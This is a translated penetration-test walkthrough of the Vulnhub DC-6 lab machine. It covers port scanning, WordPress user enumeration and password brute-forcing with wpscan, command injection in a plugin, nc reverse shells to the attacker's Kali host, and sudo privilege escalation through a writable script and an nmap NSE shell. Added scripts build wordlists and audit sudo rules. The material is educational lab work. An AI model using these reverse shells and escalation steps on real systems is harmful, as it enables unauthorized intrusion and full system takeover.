Vulnhub DC-6 Penetration Walkthrough

admin, 2024-10-11 13:56:17

0x00 Preface

This is the fifth target machine that the 网络安全自修室 group works through together each week; anyone interested is welcome to join the hands-on sessions, since practice is where the real learning happens.

The target can be downloaded for free from Vulnhub and run locally in a virtual machine. The exercise is a hunt for the flags hidden on the target, with the final flag as the goal.

Attacker: Kali Linux (192.168.241.129)

Target: 192.168.241.139

Tools: masscan | nmap | wpscan | nc | BurpSuite

0x01 Key points

  • Brute-forcing WordPress credentials with wpscan
  • Privilege escalation via sudo nmap

0x02 Information gathering

A full port sweep shows that ports 80 and 22 are open:

sudo masscan --min-rate=10000 192.168.241.139 -p-

Next, run a detailed service and OS scan against the open ports:

sudo nmap -O -sC -sV 192.168.241.139 -p 80,22 -oN 139.xml

(-oN writes nmap's normal text output; the .xml extension is just the file name chosen here. Use -oX if you actually want XML.)

From this, the target is Linux with ports 22 and 80 open, and the web service runs WordPress. Experience says the web side is the place to break in, so the plan is to brute-force the admin panel and SSH credentials with a wordlist.

One thing to note: port 80 is open but the site does not load, because it redirects to the hostname wordy. Add a hosts entry mapping the IP to that name:

Windows 10: C:\Windows\System32\drivers\etc\hosts

Linux: /etc/hosts

192.168.241.139 wordy

0x03 Gaining access

Enumerate users with wpscan; five users are found, which are saved to users.txt:

wpscan --url wordy -e u

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Now that we have usernames, all that is missing is a wordlist. The official DC-6 hint says the password contains k01, so extracting only those entries from rockyou saves a lot of brute-force time.

Generate the wordlist from the hint:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

Start brute-forcing:

wpscan --url http://wordy/ -U users.txt -P passwords.txt

This yields the credentials mark / helpdesk01.
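The two inputs that brute-force step needs, users.txt and a hint-filtered wordlist, are easy to get wrong by hand (banner lines from wpscan slipping into users.txt, duplicate or mis-ordered candidates in the wordlist). The script below is an added example and is not code from the original post: WPSCAN_SAMPLE is constructed to mimic wpscan's layout around the five users shown above, and ROCKYOU_SAMPLE is a constructed stand-in for /usr/share/wordlists/rockyou.txt. The function names are my own.

```shell
#!/bin/sh
# Added example, not from the original post: build the two inputs the
# brute-force step needs, users.txt from wpscan's enumeration output and a
# hint-filtered wordlist from rockyou. WPSCAN_SAMPLE is constructed to mimic
# wpscan's layout around the users shown in the post; ROCKYOU_SAMPLE is a
# constructed stand-in for /usr/share/wordlists/rockyou.txt.

WPSCAN_SAMPLE='[+] URL: http://wordy/ [192.168.241.139]
[+] Enumerating Users (via Passive and Aggressive Methods)

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Wp Json Api (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] Finished: (constructed sample)
[+] Requests Done: 57'

ROCKYOU_SAMPLE='123456
password
helpdesk01
k01gaming
iloveyou
k01gaming
dork01
qwerty'

# Extract user names from `wpscan ... -e u` output on stdin. Only "[+] name"
# lines after the "User(s) Identified" header count; banner lines such as
# "[+] URL: ..." or "[+] Finished: ..." contain spaces and are skipped.
wpscan_users() {
    awk '/^\[i\] User\(s\) Identified:/ { in_users = 1; next }
         in_users && /^\[[+]\] [^ ]+$/ { print substr($0, 5) }'
}

# Filter a wordlist on stdin down to entries containing the hint in $1,
# keeping rockyou's frequency order and dropping duplicates, so the most
# common candidates are tried first and none is tried twice.
hint_wordlist() {
    grep -F -- "$1" | awk '!seen[$0]++'
}

# Number of login attempts a full -U/-P run will make: users x passwords.
attempt_count() {
    users=$(grep -c '' "$1")
    passwords=$(grep -c '' "$2")
    echo $((users * passwords))
}

# Usage on Kali with the real tools instead of the constructed samples:
#   wpscan --url http://wordy/ -e u --no-color | wpscan_users > users.txt
#   hint_wordlist k01 < /usr/share/wordlists/rockyou.txt > passwords.txt
#   attempt_count users.txt passwords.txt
#   wpscan --url http://wordy/ -U users.txt -P passwords.txt
work=$(mktemp -d)
printf '%s\n' "$WPSCAN_SAMPLE" | wpscan_users > "$work/users.txt"
printf '%s\n' "$ROCKYOU_SAMPLE" | hint_wordlist k01 > "$work/passwords.txt"
printf 'users: %s, passwords: %s, attempts: %s\n' \
    "$(grep -c '' "$work/users.txt")" \
    "$(grep -c '' "$work/passwords.txt")" \
    "$(attempt_count "$work/users.txt" "$work/passwords.txt")"
rm -rf "$work"
```

Knowing the attempt count before launching wpscan tells you whether the hint narrowed things enough to stay under any lockout plugin's threshold; with five users, every extra wordlist entry costs five requests.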

Logging into the admin panel, there is an activity-monitor plugin with a command-execution vulnerability.

Capture the plugin's request with Burp and inject an nc reverse shell into it (the -e option only exists in some netcat builds, such as netcat-traditional; it is available on this target):

nc 192.168.241.129 2222 -e /bin/bash


Upgrade to an interactive shell:

python -c "import pty;pty.spawn('/bin/bash')"

On the Kali listener side:

root@bbkali:/tmp/dc6# nc -lvp 2222
listening on [any] 2222 ...
connect to [192.168.241.129] from wordy [192.168.241.139] 36108
python -c "import pty;pty.spawn('/bin/bash')"

Browsing the filesystem as usual turns up a useful hint in things-to-do.txt:


www-data@dc-6:/home$ ls -R

.:
graham  jens  mark  sarah

./graham:

./jens:
backups.sh

./mark:
stuff

./mark/stuff:
things-to-do.txt

./sarah:

www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt 

Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

This reveals graham's password: GSo7isUM1D4

Privilege escalation

Log in over ssh as graham; sudo -l shows that backups.sh can be abused to escalate:

graham@dc-6:/home$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:/home$ cat /home/jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html

backups.sh is writable by graham, so simply replace its contents with an nc reverse shell, with a second listener on port 2223 on Kali (this overwrites the original script; append the payload or restore the file afterwards if you want to leave the target as it was):

graham@dc-6:/home/jens$ cat backups.sh 
nc 192.168.241.129 2223 -e /bin/bash
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh

That lands a shell as jens, who turns out to be allowed to run nmap as root without a password:

pwd
/home
whoami
jens
sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

Write an NSE script that spawns a shell:

echo 'os.execute("/bin/sh")' > root.nse

Run it through sudo to get root and read the flag:

sudo nmap --script=/home/jens/root.nse

jens@dc-6:~$ sudo nmap --script=/home/jens/root.nse


Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-07 00:06 AEST
# pwd
/home/jens
# whoami
root
# cd /root
# ls
theflag.txt
# cat theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
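Both hops above (graham to jens through a writable sudo-able script, jens to root through a binary that can spawn a shell on its own) are visible in sudo -l before anything is exploited. The script below is an added example, not code from the original post: it parses sudo -l output and flags those two conditions. SUDO_L_SAMPLE is constructed from the two sudo -l listings shown above, merged into one; the binary list is an illustrative subset of the GTFOBins "shell" entries, and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original post: a small audit of the NOPASSWD
# rules that `sudo -l` reports, looking for the two weaknesses used on DC-6:
#   1. a script the calling user can modify (graham -> jens via backups.sh)
#   2. a binary that can spawn a shell by itself (jens -> root via nmap --script)
# SUDO_L_SAMPLE is constructed from the output shown in the post; the
# binary list is an illustrative subset of the GTFOBins "shell" entries.

SHELL_ESCAPE_BINS="nmap vim vi less more man awk find perl python python3 ruby lua env tar zip"

SUDO_L_SAMPLE='Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
    (root) NOPASSWD: /usr/bin/nmap'

# Read `sudo -l` output on stdin; print one "runas<TAB>command" line per
# NOPASSWD rule (simplified: a "(user : group)" run-as spec is not parsed).
parse_nopasswd() {
    awk '/NOPASSWD:/ {
            runas = $1; gsub(/[()]/, "", runas)
            sub(/^.*NOPASSWD:[[:space:]]*/, "")
            print runas "\t" $0
        }'
}

# Classify one sudo-able command: ESCAPE, MISSING, WRITABLE or OK.
classify_command() {
    bin=$(printf '%s\n' "$1" | awk '{print $1}')   # drop any fixed arguments
    name=$(basename "$bin")
    case " $SHELL_ESCAPE_BINS " in
        *" $name "*)
            printf 'ESCAPE %s (can spawn a shell on its own, e.g. nmap --script)\n' "$bin"
            return ;;
    esac
    if [ ! -e "$bin" ]; then
        printf 'MISSING %s (rule points at a path that does not exist)\n' "$bin"
    elif [ -w "$bin" ]; then
        printf 'WRITABLE %s (caller can change what runs as the target user)\n' "$bin"
    elif [ -w "$(dirname "$bin")" ]; then
        printf 'WRITABLE %s (parent directory is writable, file can be replaced)\n' "$bin"
    else
        printf 'OK %s\n' "$bin"
    fi
}

# Audit every NOPASSWD rule found on stdin, one result line per rule.
audit_sudo_l() {
    parse_nopasswd | while IFS="$(printf '\t')" read -r runas cmd; do
        printf '[as %s] ' "$runas"
        classify_command "$cmd"
    done
}

# Usage on the real box: sudo -l | audit_sudo_l
# Here the constructed sample is used, so backups.sh shows as MISSING on a
# host that does not have it, while nmap is flagged as ESCAPE regardless.
printf '%s\n' "$SUDO_L_SAMPLE" | audit_sudo_l
```

Run as graham on DC-6 itself, the first rule comes back WRITABLE (the file is group-writable) and the second ESCAPE, which is exactly the two-step chain the walkthrough follows; the fix on the defending side is the mirror image: never let the calling user write to a sudo-able script, and never grant NOPASSWD on a binary that can execute arbitrary code.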

0x04 Summary

  • Brute-force the admin panel credentials with wpscan

  • Find the plugin with the command-injection vulnerability in the admin panel

  • Capture the request with Burp, modify it and catch a reverse shell

  • Upgrade to an interactive shell: python -c 'import pty;pty.spawn("/bin/bash")'

  • Look through the DC-6 user directories under /home

  • Find graham's password and log in over ssh

  • Check sudo -l and use the backup script to switch to jens

  • Find that nmap can be run as root

  • Create an nmap script and run it to get root

Originally published on the WeChat public account 网络安全自修室: 每周打靶 | Vulnhub-DC6靶机渗透实战

 

Disclaimer: the programs and methods described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site assumes no legal or joint liability. For questions, contact us by e-mail (a corporate or otherwise valid mailbox is recommended to avoid filtering; contact details are on the home page).
Source: https://cn-sec.com/archives/1933118.html